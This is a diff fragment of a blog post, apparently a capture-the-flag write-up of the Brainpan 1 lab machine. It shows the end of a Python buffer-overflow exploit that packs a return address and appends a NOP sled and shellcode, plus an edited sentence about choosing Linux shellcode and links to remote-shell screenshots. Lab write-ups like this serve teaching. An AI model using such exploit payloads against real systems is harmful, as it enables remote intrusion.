g-reig/g-reig.github.io/_posts/2020-08-03-brainpan-1-writeup.md

 retAddr = struct.pack("<I",0x311712F3)
 #Payload with 16 NOPs
 print junk+retAddr+"\x90"*16+shellcode{% endhighlight %}
-I used the Linux shellcode because I knew that the target machine was using Linux (and I already tested it in my machine).
+I used the Linux shellcode because I knew that the target machine was using Linux (and I already tested it in my machine, so I knew that it would work).
 ![Remote shell 1](remoteShell1.png)
 ![Remote shell 2](remoteShell2.png)
 <br>